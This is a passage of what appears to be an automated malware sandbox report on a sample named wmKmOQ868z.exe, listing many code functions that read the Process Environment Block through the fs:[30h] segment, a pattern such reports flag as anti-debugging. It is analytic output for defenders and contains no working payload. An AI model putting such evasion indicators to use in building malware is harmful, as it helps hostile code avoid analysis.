      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3296903E mov eax, dword ptr fs:[00000030h]4_2_3296903E
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3296903E mov eax, dword ptr fs:[00000030h]4_2_3296903E
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3296903E mov eax, dword ptr fs:[00000030h]4_2_3296903E
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3294705E mov ebx, dword ptr fs:[00000030h]4_2_3294705E
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3294705E mov eax, dword ptr fs:[00000030h]4_2_3294705E
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328CB052 mov eax, dword ptr fs:[00000030h]4_2_328CB052
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3291D070 mov ecx, dword ptr fs:[00000030h]4_2_3291D070
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_32975060 mov eax, dword ptr fs:[00000030h]4_2_32975060
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328B1070 mov eax, dword ptr fs:[00000030h]4_2_328B1070
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328B1070 mov ecx, dword ptr fs:[00000030h]4_2_328B1070
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328B1070 mov eax, dword ptr fs:[00000030h]4_2_328B1070
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328B1070 mov eax, dword ptr fs:[00000030h]4_2_328B1070
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328B1070 mov eax, dword ptr fs:[00000030h]4_2_328B1070
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328B1070 mov eax, dword ptr fs:[00000030h]4_2_328B1070
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328B1070 mov eax, dword ptr fs:[00000030h]4_2_328B1070
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328B1070 mov eax, dword ptr fs:[00000030h]4_2_328B1070
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328B1070 mov eax, dword ptr fs:[00000030h]4_2_328B1070
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328B1070 mov eax, dword ptr fs:[00000030h]4_2_328B1070
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328B1070 mov eax, dword ptr fs:[00000030h]4_2_328B1070
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328B1070 mov eax, dword ptr fs:[00000030h]4_2_328B1070
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328B1070 mov eax, dword ptr fs:[00000030h]4_2_328B1070
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3292106E mov eax, dword ptr fs:[00000030h]4_2_3292106E
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_32955180 mov eax, dword ptr fs:[00000030h]4_2_32955180
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_32955180 mov eax, dword ptr fs:[00000030h]4_2_32955180
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328F7190 mov eax, dword ptr fs:[00000030h]4_2_328F7190
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_329511A4 mov eax, dword ptr fs:[00000030h]4_2_329511A4
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_329511A4 mov eax, dword ptr fs:[00000030h]4_2_329511A4
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_329511A4 mov eax, dword ptr fs:[00000030h]4_2_329511A4
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_329511A4 mov eax, dword ptr fs:[00000030h]4_2_329511A4
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328BB1B0 mov eax, dword ptr fs:[00000030h]4_2_328BB1B0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_329751CB mov eax, dword ptr fs:[00000030h]4_2_329751CB
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328DD1D0 mov eax, dword ptr fs:[00000030h]4_2_328DD1D0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328DD1D0 mov ecx, dword ptr fs:[00000030h]4_2_328DD1D0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328C51EF mov eax, dword ptr fs:[00000030h]4_2_328C51EF
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328C51EF mov eax, dword ptr fs:[00000030h]4_2_328C51EF
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328C51EF mov eax, dword ptr fs:[00000030h]4_2_328C51EF
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328C51EF mov eax, dword ptr fs:[00000030h]4_2_328C51EF
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328C51EF mov eax, dword ptr fs:[00000030h]4_2_328C51EF
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328C51EF mov eax, dword ptr fs:[00000030h]4_2_328C51EF
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328C51EF mov eax, dword ptr fs:[00000030h]4_2_328C51EF
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328C51EF mov eax, dword ptr fs:[00000030h]4_2_328C51EF
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328C51EF mov eax, dword ptr fs:[00000030h]4_2_328C51EF
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328C51EF mov eax, dword ptr fs:[00000030h]4_2_328C51EF
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328C51EF mov eax, dword ptr fs:[00000030h]4_2_328C51EF
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328C51EF mov eax, dword ptr fs:[00000030h]4_2_328C51EF
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328C51EF mov eax, dword ptr fs:[00000030h]4_2_328C51EF
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328A51ED mov eax, dword ptr fs:[00000030h]4_2_328A51ED
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_329471F9 mov esi, dword ptr fs:[00000030h]4_2_329471F9
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328A1131 mov eax, dword ptr fs:[00000030h]4_2_328A1131
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328A1131 mov eax, dword ptr fs:[00000030h]4_2_328A1131
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3289B136 mov eax, dword ptr fs:[00000030h]4_2_3289B136
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3289B136 mov eax, dword ptr fs:[00000030h]4_2_3289B136
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3289B136 mov eax, dword ptr fs:[00000030h]4_2_3289B136
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3289B136 mov eax, dword ptr fs:[00000030h]4_2_3289B136
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_32899148 mov eax, dword ptr fs:[00000030h]4_2_32899148
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_32899148 mov eax, dword ptr fs:[00000030h]4_2_32899148
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_32899148 mov eax, dword ptr fs:[00000030h]4_2_32899148
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_32899148 mov eax, dword ptr fs:[00000030h]4_2_32899148
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_32975152 mov eax, dword ptr fs:[00000030h]4_2_32975152
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_32933140 mov eax, dword ptr fs:[00000030h]4_2_32933140
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_32933140 mov eax, dword ptr fs:[00000030h]4_2_32933140
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_32933140 mov eax, dword ptr fs:[00000030h]4_2_32933140
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328A7152 mov eax, dword ptr fs:[00000030h]4_2_328A7152
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_32939179 mov eax, dword ptr fs:[00000030h]4_2_32939179
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3289F172 mov eax, dword ptr fs:[00000030h]4_2_3289F172
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3289F172 mov eax, dword ptr fs:[00000030h]4_2_3289F172
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3289F172 mov eax, dword ptr fs:[00000030h]4_2_3289F172
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3289F172 mov eax, dword ptr fs:[00000030h]4_2_3289F172
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3289F172 mov eax, dword ptr fs:[00000030h]4_2_3289F172
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3289F172 mov eax, dword ptr fs:[00000030h]4_2_3289F172
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3289F172 mov eax, dword ptr fs:[00000030h]4_2_3289F172
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3289F172 mov eax, dword ptr fs:[00000030h]4_2_3289F172
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3289F172 mov eax, dword ptr fs:[00000030h]4_2_3289F172
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3289F172 mov eax, dword ptr fs:[00000030h]4_2_3289F172
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3289F172 mov eax, dword ptr fs:[00000030h]4_2_3289F172
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3289F172 mov eax, dword ptr fs:[00000030h]4_2_3289F172
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3289F172 mov eax, dword ptr fs:[00000030h]4_2_3289F172
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3289F172 mov eax, dword ptr fs:[00000030h]4_2_3289F172
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3289F172 mov eax, dword ptr fs:[00000030h]4_2_3289F172
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3289F172 mov eax, dword ptr fs:[00000030h]4_2_3289F172
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3289F172 mov eax, dword ptr fs:[00000030h]4_2_3289F172
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3289F172 mov eax, dword ptr fs:[00000030h]4_2_3289F172
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3289F172 mov eax, dword ptr fs:[00000030h]4_2_3289F172
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3289F172 mov eax, dword ptr fs:[00000030h]4_2_3289F172
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3289F172 mov eax, dword ptr fs:[00000030h]4_2_3289F172
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3292368C mov eax, dword ptr fs:[00000030h]4_2_3292368C
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3292368C mov eax, dword ptr fs:[00000030h]4_2_3292368C
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3292368C mov eax, dword ptr fs:[00000030h]4_2_3292368C
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3292368C mov eax, dword ptr fs:[00000030h]4_2_3292368C
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3289D6AA mov eax, dword ptr fs:[00000030h]4_2_3289D6AA
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3289D6AA mov eax, dword ptr fs:[00000030h]4_2_3289D6AA
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328976B2 mov eax, dword ptr fs:[00000030h]4_2_328976B2
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328976B2 mov eax, dword ptr fs:[00000030h]4_2_328976B2
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328976B2 mov eax, dword ptr fs:[00000030h]4_2_328976B2
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328D16CF mov eax, dword ptr fs:[00000030h]4_2_328D16CF
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328AB6C0 mov eax, dword ptr fs:[00000030h]4_2_328AB6C0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328AB6C0 mov eax, dword ptr fs:[00000030h]4_2_328AB6C0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328AB6C0 mov eax, dword ptr fs:[00000030h]4_2_328AB6C0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328AB6C0 mov eax, dword ptr fs:[00000030h]4_2_328AB6C0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328AB6C0 mov eax, dword ptr fs:[00000030h]4_2_328AB6C0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328AB6C0 mov eax, dword ptr fs:[00000030h]4_2_328AB6C0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3295F6C7 mov eax, dword ptr fs:[00000030h]4_2_3295F6C7
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_329616CC mov eax, dword ptr fs:[00000030h]4_2_329616CC
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_329616CC mov eax, dword ptr fs:[00000030h]4_2_329616CC
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_329616CC mov eax, dword ptr fs:[00000030h]4_2_329616CC
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_329616CC mov eax, dword ptr fs:[00000030h]4_2_329616CC
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328D36EF mov eax, dword ptr fs:[00000030h]4_2_328D36EF
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3295D6F0 mov eax, dword ptr fs:[00000030h]4_2_3295D6F0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328CD6E0 mov eax, dword ptr fs:[00000030h]4_2_328CD6E0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328CD6E0 mov eax, dword ptr fs:[00000030h]4_2_328CD6E0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_329336EE mov eax, dword ptr fs:[00000030h]4_2_329336EE
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_329336EE mov eax, dword ptr fs:[00000030h]4_2_329336EE
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_329336EE mov eax, dword ptr fs:[00000030h]4_2_329336EE
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_329336EE mov eax, dword ptr fs:[00000030h]4_2_329336EE
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_329336EE mov eax, dword ptr fs:[00000030h]4_2_329336EE
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_329336EE mov eax, dword ptr fs:[00000030h]4_2_329336EE
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328D1607 mov eax, dword ptr fs:[00000030h]4_2_328D1607
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328DF603 mov eax, dword ptr fs:[00000030h]4_2_328DF603
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328A3616 mov eax, dword ptr fs:[00000030h]4_2_328A3616
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328A3616 mov eax, dword ptr fs:[00000030h]4_2_328A3616
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_32975636 mov eax, dword ptr fs:[00000030h]4_2_32975636
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3289F626 mov eax, dword ptr fs:[00000030h]4_2_3289F626
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3289F626 mov eax, dword ptr fs:[00000030h]4_2_3289F626
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3289F626 mov eax, dword ptr fs:[00000030h]4_2_3289F626
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3289F626 mov eax, dword ptr fs:[00000030h]4_2_3289F626
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3289F626 mov eax, dword ptr fs:[00000030h]4_2_3289F626
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3289F626 mov eax, dword ptr fs:[00000030h]4_2_3289F626
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3289F626 mov eax, dword ptr fs:[00000030h]4_2_3289F626
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3289F626 mov eax, dword ptr fs:[00000030h]4_2_3289F626
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3289F626 mov eax, dword ptr fs:[00000030h]4_2_3289F626
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328D9660 mov eax, dword ptr fs:[00000030h]4_2_328D9660
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328D9660 mov eax, dword ptr fs:[00000030h]4_2_328D9660
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3293D660 mov eax, dword ptr fs:[00000030h]4_2_3293D660
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3295F78A mov eax, dword ptr fs:[00000030h]4_2_3295F78A
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_329737B6 mov eax, dword ptr fs:[00000030h]4_2_329737B6
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3295D7B0 mov eax, dword ptr fs:[00000030h]4_2_3295D7B0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3295D7B0 mov eax, dword ptr fs:[00000030h]4_2_3295D7B0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3289F7BA mov eax, dword ptr fs:[00000030h]4_2_3289F7BA
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3289F7BA mov eax, dword ptr fs:[00000030h]4_2_3289F7BA
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3289F7BA mov eax, dword ptr fs:[00000030h]4_2_3289F7BA
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3289F7BA mov eax, dword ptr fs:[00000030h]4_2_3289F7BA
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3289F7BA mov eax, dword ptr fs:[00000030h]4_2_3289F7BA
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3289F7BA mov eax, dword ptr fs:[00000030h]4_2_3289F7BA
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3289F7BA mov eax, dword ptr fs:[00000030h]4_2_3289F7BA
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3289F7BA mov eax, dword ptr fs:[00000030h]4_2_3289F7BA
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3289F7BA mov eax, dword ptr fs:[00000030h]4_2_3289F7BA
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_329297A9 mov eax, dword ptr fs:[00000030h]4_2_329297A9
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328CD7B0 mov eax, dword ptr fs:[00000030h]4_2_328CD7B0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3292F7AF mov eax, dword ptr fs:[00000030h]4_2_3292F7AF
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3292F7AF mov eax, dword ptr fs:[00000030h]4_2_3292F7AF
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3292F7AF mov eax, dword ptr fs:[00000030h]4_2_3292F7AF
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3292F7AF mov eax, dword ptr fs:[00000030h]4_2_3292F7AF
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3292F7AF mov eax, dword ptr fs:[00000030h]4_2_3292F7AF
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328A57C0 mov eax, dword ptr fs:[00000030h]4_2_328A57C0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328A57C0 mov eax, dword ptr fs:[00000030h]4_2_328A57C0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328A57C0 mov eax, dword ptr fs:[00000030h]4_2_328A57C0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328AD7E0 mov ecx, dword ptr fs:[00000030h]4_2_328AD7E0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328A5702 mov eax, dword ptr fs:[00000030h]4_2_328A5702
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328A5702 mov eax, dword ptr fs:[00000030h]4_2_328A5702
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328A7703 mov eax, dword ptr fs:[00000030h]4_2_328A7703
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328DF71F mov eax, dword ptr fs:[00000030h]4_2_328DF71F
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328DF71F mov eax, dword ptr fs:[00000030h]4_2_328DF71F
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328A3720 mov eax, dword ptr fs:[00000030h]4_2_328A3720
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3297B73C mov eax, dword ptr fs:[00000030h]4_2_3297B73C
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3297B73C mov eax, dword ptr fs:[00000030h]4_2_3297B73C
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3297B73C mov eax, dword ptr fs:[00000030h]4_2_3297B73C
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3297B73C mov eax, dword ptr fs:[00000030h]4_2_3297B73C
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328BF720 mov eax, dword ptr fs:[00000030h]4_2_328BF720
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328BF720 mov eax, dword ptr fs:[00000030h]4_2_328BF720
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328BF720 mov eax, dword ptr fs:[00000030h]4_2_328BF720
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328A973A mov eax, dword ptr fs:[00000030h]4_2_328A973A
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328A973A mov eax, dword ptr fs:[00000030h]4_2_328A973A
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_32899730 mov eax, dword ptr fs:[00000030h]4_2_32899730
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_32899730 mov eax, dword ptr fs:[00000030h]4_2_32899730
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328D5734 mov eax, dword ptr fs:[00000030h]4_2_328D5734
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3295F72E mov eax, dword ptr fs:[00000030h]4_2_3295F72E
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3296972B mov eax, dword ptr fs:[00000030h]4_2_3296972B
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328B3740 mov eax, dword ptr fs:[00000030h]4_2_328B3740
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328B3740 mov eax, dword ptr fs:[00000030h]4_2_328B3740
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328B3740 mov eax, dword ptr fs:[00000030h]4_2_328B3740
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3294375F mov eax, dword ptr fs:[00000030h]4_2_3294375F
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3294375F mov eax, dword ptr fs:[00000030h]4_2_3294375F
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3294375F mov eax, dword ptr fs:[00000030h]4_2_3294375F
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3294375F mov eax, dword ptr fs:[00000030h]4_2_3294375F
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3294375F mov eax, dword ptr fs:[00000030h]4_2_3294375F
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_32973749 mov eax, dword ptr fs:[00000030h]4_2_32973749
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3289B765 mov eax, dword ptr fs:[00000030h]4_2_3289B765
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3289B765 mov eax, dword ptr fs:[00000030h]4_2_3289B765
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3289B765 mov eax, dword ptr fs:[00000030h]4_2_3289B765
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3289B765 mov eax, dword ptr fs:[00000030h]4_2_3289B765
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3289B480 mov eax, dword ptr fs:[00000030h]4_2_3289B480
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328A9486 mov eax, dword ptr fs:[00000030h]4_2_328A9486
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328A9486 mov eax, dword ptr fs:[00000030h]4_2_328A9486
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328974B0 mov eax, dword ptr fs:[00000030h]4_2_328974B0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328974B0 mov eax, dword ptr fs:[00000030h]4_2_328974B0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328D34B0 mov eax, dword ptr fs:[00000030h]4_2_328D34B0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_329754DB mov eax, dword ptr fs:[00000030h]4_2_329754DB
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_329494E0 mov eax, dword ptr fs:[00000030h]4_2_329494E0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328C340D mov eax, dword ptr fs:[00000030h]4_2_328C340D
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_32927410 mov eax, dword ptr fs:[00000030h]4_2_32927410
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3294B450 mov eax, dword ptr fs:[00000030h]4_2_3294B450
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3294B450 mov eax, dword ptr fs:[00000030h]4_2_3294B450
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3294B450 mov eax, dword ptr fs:[00000030h]4_2_3294B450
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3294B450 mov eax, dword ptr fs:[00000030h]4_2_3294B450
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3295F453 mov eax, dword ptr fs:[00000030h]4_2_3295F453
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328AB440 mov eax, dword ptr fs:[00000030h]4_2_328AB440
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328AB440 mov eax, dword ptr fs:[00000030h]4_2_328AB440
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328AB440 mov eax, dword ptr fs:[00000030h]4_2_328AB440
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328AB440 mov eax, dword ptr fs:[00000030h]4_2_328AB440
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328AB440 mov eax, dword ptr fs:[00000030h]4_2_328AB440
